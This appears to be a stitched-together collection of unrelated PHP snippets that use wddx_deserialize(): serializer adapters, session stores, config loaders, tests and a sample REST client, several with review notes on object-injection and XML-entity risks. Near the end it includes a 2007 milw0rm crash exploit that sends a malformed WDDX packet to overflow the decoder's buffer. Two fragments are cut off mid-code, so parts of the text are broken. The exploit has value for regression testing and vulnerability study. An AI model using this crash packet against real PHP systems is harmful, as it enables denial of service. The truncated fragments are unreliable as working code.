/**
 * Fetch the stored session payload for a key and attach the key's TTL.
 *
 * The raw value read from the store is decoded with wddx_deserialize() and
 * the store's ttl() for the same key is written into the 'ttl' element.
 *
 * NOTE(review): wddx_deserialize() is only as safe as the data in the store;
 * like unserialize(), a WDDX packet can name a PHP class to instantiate.
 * Confirm that only this application writes to the session store.
 *
 * @param string $key Store key of the session entry
 * @return mixed Decoded payload with a 'ttl' element added
 */
public function sessionData($key)
{
    $payload = wddx_deserialize($this->_store->get($key));
    $payload['ttl'] = $this->_store->ttl($key);

    return $payload;
}
/**
 * Decode a WDDX packet, falling back to a default for empty input.
 *
 * "Empty" follows PHP's empty() rules, so '', '0', null and false all
 * yield the default without touching the decoder.
 *
 * @param string $value        WDDX packet to decode
 * @param array  $defaultValue Returned when $value is empty
 * @return array
 */
public function unserialize($value, $defaultValue = array())
{
    return empty($value) ? $defaultValue : wddx_deserialize($value);
}
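/**
 * Load configuration from a WDDX file.
 *
 * The file handle is checked before use and always closed. An unreadable or
 * empty file is reported the same way as an undecodable one
 * (PATCONFIGURATION_ERROR_CONFIG_INVALID).
 *
 * @access public
 * @param  string $configFile full path of the config file
 * @param  array  $options    various options, depending on the reader (unused here)
 * @return array  $config     complete configuration, or a patErrorManager error
 */
function loadConfigFile($configFile, $options = array())
{
    if (!function_exists("wddx_add_vars")) {
        return patErrorManager::raiseError(PATCONFIGURATION_ERROR_DRIVER_NOT_WORKING, "WDDX extension is not installed on your system.");
    }

    $wddx = false;
    $fp = @fopen($configFile, "r");
    if ($fp !== false) {
        $size = filesize($configFile);
        // fread() rejects a zero length, so only read when there is content.
        if ($size > 0) {
            $wddx = fread($fp, $size);
        }
        fclose($fp);
    }

    // Never hand a failed read to the decoder.
    $conf = is_string($wddx) ? wddx_deserialize($wddx) : NULL;
    if ($conf === NULL) {
        return patErrorManager::raiseError(PATCONFIGURATION_ERROR_CONFIG_INVALID, "{$configFile} is no valid WDDX file.");
    }

    return array("config" => $conf, "externalFiles" => array(), "cacheAble" => true);
}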
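/**
 * Interpret a raw HTTP response whose body is a WDDX packet with a 'login' flag.
 *
 * The response is remote, untrusted input: the decoded value is checked to be
 * an array before it is indexed, and the server-supplied error text is
 * HTML-escaped before it is printed into the page.
 *
 * @param string $data Raw HTTP response (headers, blank line, body)
 * @return bool TRUE when the packet carries login === TRUE, FALSE otherwise
 */
function parse_response($data)
{
    // skip HTTP header; strstr() returns false when there is no blank line
    $body = strstr($data, "\r\n\r\n");
    $vars = ($body === false) ? null : wddx_deserialize(ltrim($body));

    if (is_array($vars) && isset($vars['login']) && $vars['login'] === TRUE) {
        return TRUE;
    }

    // Login refused or response malformed: report what the server sent.
    $code = (is_array($vars) && isset($vars['error'])) ? $vars['error'] : 0;
    $text = (is_array($vars) && isset($vars['error_str']) && is_scalar($vars['error_str']))
        ? (string) $vars['error_str']
        : '';
    printf("ERROR #%d: %s<br />\n", $code, htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));

    return FALSE;
}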
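/**
 * Decode a stored value that may carry a WDDX packet behind a marker prefix.
 *
 * - NULL and non-scalar values are returned unchanged.
 * - When no prefix is configured ($this->len < 1) every scalar is decoded.
 * - Otherwise only values that start with $this->prefix are decoded; the
 *   prefix is compared as a string (strict), so numeric-looking prefixes
 *   such as "10" and "1e1" are no longer treated as equal.
 *
 * @param mixed $v Stored value
 * @return mixed Decoded value, or $v itself when it is not a prefixed packet
 */
public function unserialize($v)
{
    if ($v === NULL) {
        return NULL;
    }
    if (!is_scalar($v)) {
        return $v;
    }
    if ($this->len < 1) {
        return wddx_deserialize($v);
    }

    $text = (string) $v;
    if (substr($text, 0, $this->len) !== (string) $this->prefix) {
        return $v;
    }

    return wddx_deserialize(substr($text, $this->len));
}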
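/**
 * Unserialize from WDDX to PHP
 *
 * wddx_deserialize() returns null both for a packet that encodes null and
 * for an undecodable string, so a null result is re-checked by parsing the
 * XML. That second parse runs with the libxml entity loader disabled and
 * rejects any document carrying a DOCTYPE, so entity declarations in the
 * input are never processed.
 *
 * @param  string $wddx
 * @param  array  $opts Accepted for interface compatibility; not used here
 * @return mixed
 * @throws RuntimeException on wddx error
 */
public function unserialize($wddx, array $opts = array())
{
    $ret = wddx_deserialize($wddx);

    if ($ret === null && class_exists('SimpleXMLElement', false)) {
        // check if the returned NULL is valid
        // or based on an invalid wddx string
        try {
            $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
            $dom = new \DOMDocument();
            $loaded = $dom->loadXML($wddx);
            // Restore immediately so no throw below can leave the
            // process-wide setting changed.
            libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);

            if ($loaded === false) {
                throw new RuntimeException('Invalid wddx');
            }
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    throw new RuntimeException('Invalid XML: Detected use of illegal DOCTYPE');
                }
            }

            $simpleXml = simplexml_import_dom($dom);
            if (isset($simpleXml->data[0]->null[0])) {
                return null; // valid null
            }
            throw new RuntimeException('Invalid wddx');
        } catch (\Exception $e) {
            throw new RuntimeException($e->getMessage(), 0, $e);
        }
    }

    return $ret;
}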
/**
 * Unserialize data.
 *
 * Applies exactly one decoding step, selected by $mode, to $data (which is
 * taken by reference and overwritten). Two modes decode PHP values from the
 * input and therefore need trusted input: WDDX and BASIC.
 *
 * @param mixed $data    The data to be unserialized.
 * @param mixed $mode    The mode of unserialization.  Can be either a
 *                       single mode or array of modes.  If array, will be
 *                       unserialized in the order provided.
 *                       NOTE(review): the switch below handles one mode
 *                       value; array handling is presumably done by the
 *                       public unserialize() - confirm.
 * @param mixed $params  Any additional parameters the unserialization
 *                       method requires.
 *
 * @return mixed  Unserialized data.
 * @throws Horde_Serialize_Exception
 */
protected static function _unserialize(&$data, $mode, $params = null)
{
    switch ($mode) {
    case self::NONE:
        break;

    case self::RAW:
        $data = rawurldecode($data);
        break;

    case self::URL:
        $data = urldecode($data);
        break;

    case self::WDDX:
        // NOTE(review): a WDDX packet can name a PHP class to instantiate,
        // so this mode has the same trust requirements as BASIC below.
        $data = wddx_deserialize($data);
        break;

    case self::BZIP:
        // $params['small'] = Use bzip2 'small memory' mode?
        $data = bzdecompress($data, isset($params['small']) ? $params['small'] : false);
        break;

    case self::IMAP8:
        $data = quoted_printable_decode($data);
        break;

    case self::IMAPUTF7:
        $data = Horde_String::convertCharset(Horde_Imap_Client_Utf7imap::Utf7ImapToUtf8($data), 'UTF-8', 'ISO-8859-1');
        break;

    case self::IMAPUTF8:
        $data = Horde_Mime::encode($data);
        break;

    case self::BASIC:
        // NOTE(review): unserialize() on input that is not fully trusted
        // allows PHP object injection; the @ also hides decode warnings.
        // Callers must only select BASIC for data the application wrote.
        $data2 = @unserialize($data);
        // Unserialize can return false both on error and if $data is the
        // false value.
        if ($data2 === false && $data == serialize(false)) {
            return $data2;
        }
        $data = $data2;
        break;

    case self::GZ_DEFLATE:
        $data = gzinflate($data);
        break;

    case self::BASE64:
        $data = base64_decode($data);
        break;

    case self::GZ_COMPRESS:
        $data = gzuncompress($data);
        break;

    // $params = Output character set
    case self::UTF7:
        $data = Horde_String::convertCharset($data, 'utf-7', $params);
        break;

    // $params = Output character set
    case self::UTF7_BASIC:
        // Chains BASIC then UTF7 through self::unserialize().
        $data = self::unserialize($data, array(self::BASIC, self::UTF7), $params);
        break;

    case self::JSON:
        $out = json_decode($data);
        // json_decode() returns null on error as well as for the literal
        // 'null'; only the latter is a valid null result.
        if (!is_null($out) || strcasecmp($data, 'null') === 0) {
            return $out;
        }
        // On a decode error $data is left as it was and falls through to
        // the common check below.
        break;

    case self::LZF:
        $data = @lzf_decompress($data);
        break;
    }

    // Every decoder above that signals failure with false ends up here.
    if ($data === false) {
        throw new Horde_Serialize_Exception('Unserialization failed.');
    }
    return $data;
}
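/**
 * Unserialize from WDDX to PHP
 *
 * A null result from wddx_deserialize() is ambiguous (encoded null vs.
 * undecodable input), so the XML is parsed again to tell the two apart.
 * The re-parse runs with the libxml entity loader disabled and rejects any
 * DOCTYPE. The previous loader setting is restored directly after parsing,
 * so it is also restored when the DOCTYPE check throws.
 *
 * @param  string $wddx
 * @param  array  $opts Accepted for interface compatibility; not used here
 * @return mixed
 * @throws Zend_Serializer_Exception on wddx error
 */
public function unserialize($wddx, array $opts = array())
{
    $ret = wddx_deserialize($wddx);

    if ($ret === null) {
        // check if the returned NULL is valid
        // or based on an invalid wddx string
        try {
            $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
            $dom = new DOMDocument();
            $loaded = $dom->loadXML($wddx);
            libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);

            if ($loaded === false) {
                throw new Zend_Serializer_Exception('Can\'t unserialize wddx string');
            }
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    throw new Zend_Serializer_Exception('Invalid XML: Detected use of illegal DOCTYPE');
                }
            }

            $simpleXml = simplexml_import_dom($dom);
            if (isset($simpleXml->data[0]->null[0])) {
                return null; // valid null
            }
            $errMsg = 'Can\'t unserialize wddx string';
        } catch (Exception $e) {
            $errMsg = $e->getMessage();
        }

        throw new Zend_Serializer_Exception($errMsg);
    }

    return $ret;
}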
<?php // Our assoc array $talk = array('id' => 4, 'title' => 'Dynamic Images in PHP - How and When to Use Them', 'date' => '2002-04-29', 'speaker' => 'Alison Gianotto', 'url' => 'http://www.sdphp.net/talks/ag_image'); // we can serialize the value and // create the packet in one step $ser1 = wddx_serialize_vars('talk'); echo format_packet($ser1, 'In one step'); // or we could serialize it in several steps $packet = wddx_packet_start("One of Alison's talks at SDPHP"); wddx_add_vars($packet, 'talk'); $ser2 = wddx_packet_end($packet); echo format_packet($ser2, 'Making the packet by hand'); // now let's deserialize the packet $vars = wddx_deserialize($ser2); echo "<pre>\n<small>\n"; print_r($vars); echo "</small>\n</pre>\n"; function format_packet($pckt, $title = 'wddx packet') { $re = '/^[^<]/'; $pckt = str_replace('>', ">\n", $pckt); $t = explode("\n", $pckt); $s = "[ {$title} ]<br>\n<pre>\n"; foreach ($t as $line) { if (trim($line) == '') { continue; } elseif (preg_match($re, $line)) { $tmp = explode("\n", str_replace('<', "\n<", $line)); $s .= ' <span style="color: blue;">' . $tmp[0] . "</span>\n" . htmlspecialchars($tmp[1]) . "\n"; } else {
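/**
 * Unserialize from WDDX to PHP
 *
 * A null result from wddx_deserialize() is re-checked by parsing the XML.
 * The re-parse disables the libxml entity loader, then restores the value
 * it had before (not a hard-coded false) directly after parsing, so a
 * parse failure cannot leave the process-wide setting changed. Documents
 * carrying a DOCTYPE are rejected.
 *
 * @param  string $wddx
 * @return mixed
 * @throws Exception\RuntimeException on wddx error
 */
public function unserialize($wddx)
{
    $ret = wddx_deserialize($wddx);

    if ($ret === null && class_exists('SimpleXMLElement', false)) {
        // check if the returned NULL is valid
        // or based on an invalid wddx string
        try {
            $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
            $dom = new \DOMDocument();
            $loaded = $dom->loadXML($wddx);
            libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);

            if ($loaded === false) {
                throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
            }
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    throw new Exception\RuntimeException('Invalid XML: Detected use of illegal DOCTYPE');
                }
            }

            $simpleXml = simplexml_import_dom($dom);
            if (isset($simpleXml->data[0]->null[0])) {
                return null; // valid null
            }
            throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
        } catch (\Exception $e) {
            throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e);
        }
    }

    return $ret;
}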
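/**
 * Unserialize from WDDX to PHP
 *
 * A null result from wddx_deserialize() is ambiguous (encoded null vs.
 * undecodable input), so the XML is parsed again to tell the two apart.
 * The re-parse runs with the libxml entity loader disabled and rejects any
 * document carrying a DOCTYPE, so entity declarations in the input are
 * never processed.
 *
 * @param  string $wddx
 * @param  array  $opts Accepted for interface compatibility; not used here
 * @return mixed
 * @throws Zend_Serializer_Exception on wddx error
 */
public function unserialize($wddx, array $opts = array())
{
    $ret = wddx_deserialize($wddx);

    if ($ret === null) {
        // check if the returned NULL is valid
        // or based on an invalid wddx string
        try {
            $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
            $dom = new DOMDocument();
            $loaded = $dom->loadXML($wddx);
            // Restore immediately so no throw below can leave the
            // process-wide setting changed.
            libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);

            if ($loaded === false) {
                throw new Zend_Serializer_Exception('Can\'t unserialize wddx string');
            }
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    throw new Zend_Serializer_Exception('Invalid XML: Detected use of illegal DOCTYPE');
                }
            }

            $simpleXml = simplexml_import_dom($dom);
            if (isset($simpleXml->data[0]->null[0])) {
                return null; // valid null
            }
            $errMsg = 'Can\'t unserialize wddx string';
        } catch (Exception $e) {
            $errMsg = $e->getMessage();
        }

        throw new Zend_Serializer_Exception($errMsg);
    }

    return $ret;
}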
/**
 * Decode a WDDX packet into a PHP value.
 *
 * Thin wrapper: the result of wddx_deserialize() is returned as-is, with no
 * validation of the input or of the decoded value.
 *
 * @param string $data WDDX packet
 * @return mixed
 */
function _wddx_decode($data)
{
    $decoded = wddx_deserialize($data);

    return $decoded;
}
<var name="113301888545229100"> <struct> <var name="max"> <number>10</number> </var> <var name="cache"> <number>4</number> </var> <var name="order"> <struct> <var name="content_113300831086270200"> <struct> <var name="CMS_BUILD"> <string>desc</string> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </var> </struct> </data> </wddxpacket> WDX; var_dump(wddx_deserialize($wddx));
<?php
// Decodes the same packet twice and prints both results. The packet's
// 'handle' variable holds an empty <number> element.
$packet = "<wddxPacket version='1.0'><header><comment>my_command</comment></header><data><struct><var name='handle'><number></number></var></struct></data></wddxPacket>";

for ($pass = 0; $pass < 2; $pass++) {
    print_r(wddx_deserialize($packet));
}
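<?php
// Sample REST client - prints the uptime information returned by the
// sample REST server
// Jesus M. Castagnetto

//$host = 'www.example.com';
//$port = 80;
//$serverPath = '/xmlrpc/server.php'
$host = 'jmc.sdsc.edu';
$port = 6666;
$serverPath = '/misc/ws_rest_sample_server.php';

$packet = file_get_contents("http://{$host}:{$port}{$serverPath}");
if ($packet === false) {
    exit("Could not fetch the uptime packet from {$host}\n");
}

// The packet arrives over plain HTTP from another host, so treat it as
// untrusted: check its shape and copy out only the two fields used below.
// extract() on the decoded array would let the response overwrite any local
// variable, including $host and $sep.
$tmp = wddx_deserialize($packet);
if (!is_array($tmp) || !isset($tmp['timestamp'], $tmp['uptime']) || !is_array($tmp['uptime'])) {
    exit("Unexpected response from {$host}\n");
}
$timestamp = $tmp['timestamp'];
$uptime = $tmp['uptime'];

$sep = str_repeat('*', 50);
echo <<<_END
{$sep}
Uptime for : {$host}
Timestamp (UTC) : {$timestamp}
Local time at host : {$uptime['time']}
Host has run for : {$uptime['duration']}
Number of current users : {$uptime['users']}
Average number of jobs in queue
 1 minute : {$uptime['load1']}
 5 minutes : {$uptime['load5']}
 15 minutes : {$uptime['load15']}
{$sep}

_END;
?>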
/**
 * Delete the user-map entry that belongs to a stored session.
 *
 * Reads the session stored under $id, decodes it, looks up the user id at
 * "<AuthComponent::$sessionKey>.id" and deletes the key
 * "<_userMapPrefix>:<user id>" from the store.
 *
 * @param string $id Session id
 * @return mixed null when there is no session data or no user id, false when
 *               the stored data does not decode to an array, otherwise the
 *               result of the store's del() call
 */
protected function _removeUserMap($id)
{
    $raw = $this->_store->get($id);
    if (!$raw) {
        return;
    }

    $session = wddx_deserialize($raw);
    if (!is_array($session)) {
        return false;
    }

    $userId = Hash::get($session, AuthComponent::$sessionKey . '.id');
    if (empty($userId)) {
        return;
    }

    return $this->_store->del($this->_userMapPrefix . ':' . $userId);
}
<?php
// Writes a WDDX packet into an in-memory stream, rewinds it and passes the
// stream resource (not a string) to wddx_deserialize().
$path = dirname(__FILE__);

$stream = fopen("php://temp", 'w+');
fwrite($stream, "<wddxPacket version='1.0'><header><comment>TEST comment</comment></header><data><struct><var name='var1'><null/></var><var name='var2'><string>some string</string></var><var name='var3'><number>756</number></var><var name='var4'><boolean value='true'/></var></struct></data></wddxPacket>");
rewind($stream);

var_dump(wddx_deserialize($stream));

fclose($stream);
<?php
// Round-trips code points 65..255 through wddx_serialize_value() and
// wddx_deserialize(), printing the packet, both hex dumps and whether the
// decoded value equals the input.
for ($i = 65; $i < 256; $i++) {
    // Build the UTF-8 byte sequence for the code point.
    if ($i < 0x80) {
        $v = chr($i);
    } elseif ($i < 0xc0) {
        $v = chr(0xc2) . chr($i);
    } else {
        $v = chr(0xc3) . chr($i - 64);
    }

    $ret = wddx_serialize_value($v);
    echo $ret . "\n";

    var_dump(
        bin2hex($v),
        bin2hex(wddx_deserialize($ret)),
        $v == wddx_deserialize($ret)
    );
}
/**
 * Decode a WDDX packet into a PHP value.
 *
 * The input is passed to the decoder unchanged and the result is returned
 * without validation.
 *
 * @param string $raw WDDX packet
 *
 * @return mixed
 */
public function Decode($raw)
{
    $decoded = \wddx_deserialize($raw);

    return $decoded;
}
<?php
// Based on MediaWiki's ApiFormatWddxTest
// The omitted data in the "b" variable previously caused a fatal error
$packet = <<<EOT
<wddxPacket version="1.0">
  <header/>
  <data>
    <struct>
      <var name="a">
        <string>foo</string>
      </var>
      <var name="b"/>
    </struct>
  </data>
</wddxPacket>
EOT;

var_dump(wddx_deserialize($packet));
<?php
////////////////////////////////////////////////////////////////////////
//  Proof of concept code from the Hardened-PHP Project
//  (C) Copyright 2007 Stefan Esser
////////////////////////////////////////////////////////////////////////
//  PHP - wddx_deserialize() Crash Exploit
////////////////////////////////////////////////////////////////////////

// Reviewer summary: a single call that feeds one malformed WDDX packet to
// wddx_deserialize(). The packet declares an array of length 1, and its
// first <string> element contains a nested element (<X />) between two runs
// of filler characters. The packet holds nothing besides that filler, so the
// file is a crash reproducer for the decoder and is suitable as a regression
// input when testing a patched build.

// This is meant as a protection against remote file inclusion.
// (The script stops here unless the line is removed by hand.)
die("REMOVE THIS LINE");

// The following testcode will overflow the buffer with lots of C
wddx_deserialize("<wddxPacket version='1.0'><header/>\n <data>\n <array length='1'>\n <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>\n <string></string>\n </array>\n </data>\n </wddxPacket>");
?>
# milw0rm.com [2007-03-04]
<?php
// Reads wddx.xml from this script's directory and dumps the decoded value.
$path = dirname(__FILE__);
$packet = file_get_contents("{$path}/wddx.xml");
$decoded = wddx_deserialize($packet);

var_dump($decoded);
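/**
 * Unserialize from WDDX to PHP
 *
 * A null result from wddx_deserialize() is re-checked by parsing the XML
 * with the libxml entity loader disabled and rejecting any DOCTYPE. The
 * previous loader setting is restored directly after parsing, so it is also
 * restored when the DOCTYPE check throws.
 *
 * NOTE(review): the InvalidArgumentException raised for a DOCTYPE is thrown
 * inside the try block; if it derives from \Exception it is caught below
 * and re-thrown as RuntimeException - confirm against the class hierarchy.
 *
 * @param  string $wddx
 * @return mixed
 * @throws Exception\RuntimeException on wddx error
 * @throws Exception\InvalidArgumentException if invalid xml
 */
public function unserialize($wddx)
{
    $ret = wddx_deserialize($wddx);

    if ($ret === null && class_exists('SimpleXMLElement', false)) {
        // check if the returned NULL is valid
        // or based on an invalid wddx string
        try {
            $oldLibxmlDisableEntityLoader = libxml_disable_entity_loader(true);
            $dom = new \DOMDocument();
            $loaded = $dom->loadXML($wddx);
            libxml_disable_entity_loader($oldLibxmlDisableEntityLoader);

            if ($loaded === false) {
                throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
            }
            foreach ($dom->childNodes as $child) {
                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
                    throw new Exception\InvalidArgumentException('Invalid XML: Detected use of illegal DOCTYPE');
                }
            }

            $simpleXml = simplexml_import_dom($dom);
            if (isset($simpleXml->data[0]->null[0])) {
                return null; // valid null
            }
            throw new Exception\RuntimeException('Unserialization failed: Invalid wddx packet');
        } catch (\Exception $e) {
            throw new Exception\RuntimeException('Unserialization failed: ' . $e->getMessage(), 0, $e);
        }
    }

    return $ret;
}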
/**
 * Write the session data
 *
 * When the 'json' setting is exactly true the WDDX-serialized session is
 * decoded and stored as JSON instead; otherwise it is stored unchanged. The
 * stored record also carries the current time under 'atime'.
 *
 * @param string $id          Session ID
 * @param string $sessionData Serialized Session Data
 *
 * @return boolean True when store() returned a RiakObject
 */
public function write($id, $sessionData)
{
    $storeAsJson = ($this->_settings['json'] === true);
    if ($storeAsJson) {
        $decoded = wddx_deserialize($sessionData);
        $sessionData = json_encode($decoded);
    }

    $record = array('data' => $sessionData, 'atime' => time());
    $this->_session($id)->setData($record);

    $stored = $this->_session($id)->store();

    return $stored instanceof RiakObject;
}
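/**
 * Decode a WDDX packet that carries Chinese text.
 *
 * When Flash sends Chinese text inside a WDDX packet, PHP can no longer
 * parse the packet, so such text has to be wrapped in [wddx] tags, e.g.
 * [wddx]urlencode(text)[/wddx]. If the packet contains such tags it is
 * deserialized first and the tags are then resolved with ubbcode::parse()
 * on every string key and value of the result; otherwise parse() is applied
 * to the packet before it is deserialized.
 *
 * The tagged branch used to var_export() the decoded array, run parse()
 * over the exported PHP source and eval() the result. The packet is request
 * data, so decoded tag content ended up inside PHP source code; the values
 * are now transformed directly and nothing is evaluated.
 *
 * @author 肖飞
 * @param string $strWDDX WDDX string taken from the request
 * @return array
 */
public function WDDXdecode($strWDDX)
{
    $objUbbcode = new ubbcode();
    $strWDDX = stripslashes(nl2br($strWDDX));

    if (count($objUbbcode->ubbParameter($strWDDX))) {
        // Resolve the tags in every string key and value, recursively.
        $decodeTags = function ($value) use (&$decodeTags, $objUbbcode) {
            if (is_array($value)) {
                $result = array();
                foreach ($value as $key => $item) {
                    if (is_string($key)) {
                        $key = $objUbbcode->parse($key);
                    }
                    $result[$key] = $decodeTags($item);
                }
                return $result;
            }
            return is_string($value) ? $objUbbcode->parse($value) : $value;
        };

        $arrData = $decodeTags(wddx_deserialize($strWDDX));
    } else {
        $strWDDX = $objUbbcode->parse($strWDDX);
        $arrData = wddx_deserialize($strWDDX);
    }

    return $arrData;
}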
<?php
// Round-trips an array whose keys look numeric but are not canonical
// integers ('01', '+1', ' 1') and dumps the decoded result.
// wddx_serialize_vars() takes the NAME of the variable, so $data must keep
// its name.
$data = array(
    '01' => 'Zero',
    '+1' => 'Plus sign',
    ' 1' => 'Space',
);

$packet = wddx_serialize_vars('data');
var_dump(wddx_deserialize($packet));
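/**
 * The 'wddx' API format must produce a packet that decodes to a non-empty
 * array.
 *
 * The count is taken on the decoded value; counting the raw response string
 * cast to an array always gives 1 and could never fail.
 *
 * @requires function wddx_deserialize
 */
public function testValidSyntax()
{
    $data = $this->apiRequest('wddx', array('action' => 'query', 'meta' => 'siteinfo'));
    $decoded = wddx_deserialize($data);

    $this->assertInternalType('array', $decoded);
    $this->assertGreaterThan(0, count((array) $decoded));
}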
/**
 * Decode a WDDX packet into a PHP value.
 *
 * The packet is handed to wddx_deserialize() unchanged and the result is
 * returned without validation.
 *
 * @param string $encoded WDDX packet
 *
 * @return mixed
 */
public function decode(string $encoded)
{
    $decoded = wddx_deserialize($encoded);

    return $decoded;
}
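/**
 * Unpacks a raw string as created by _packSchema into an array
 * structure for use as $this->_schema
 *
 * The format is chosen from the first byte: 'a' selects PHP's native
 * unserialize(), '<' selects WDDX. An empty string is reported as an
 * unknown format. As a side effect $this->_primaryKey is set from the
 * fields flagged 'primary_key', or to '_rowid' when there are none.
 *
 * NOTE(review): both decoders can create objects of classes named in the
 * input, so the raw schema must come from a file this application wrote.
 *
 * @access private
 * @param  string $rawSchema data to be unpacked into the schema
 * @return array
 */
function _unpackSchema($rawSchema)
{
    // Guard the offset read so an empty string takes the "unknown" path
    // without raising an uninitialized-offset error.
    $format = isset($rawSchema[0]) ? $rawSchema[0] : '';

    if ($format == 'a') {
        // Flagged: unserialize() on data that is not fully trusted allows
        // PHP object injection.
        $schema = unserialize($rawSchema);
    } elseif ($format == '<') {
        if (!function_exists('wddx_deserialize')) {
            return $this->raiseError('wddx extension not found!');
        }
        $schema = wddx_deserialize($rawSchema);
    } else {
        return $this->raiseError('Unknown schema format');
    }

    $primaryKey = array();
    // A failed decode does not yield an array; skip the scan in that case.
    if (is_array($schema)) {
        foreach ($schema as $name => $meta) {
            if (isset($meta['primary_key'])) {
                $primaryKey[$name] = true;
            }
        }
    }

    if (sizeof($primaryKey)) {
        $this->_primaryKey = $primaryKey;
    } else {
        $this->_primaryKey = array('_rowid' => true);
    }

    return $schema;
}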
<pre>
<?php
// Reads wddx_packet.xml from this script's directory and prints the decoded
// value inside the surrounding <pre> element. print_r() output is not
// HTML-escaped.
$path = dirname(__FILE__);
$packet = file_get_contents("{$path}/wddx_packet.xml");

print_r(wddx_deserialize($packet));
?>
</pre>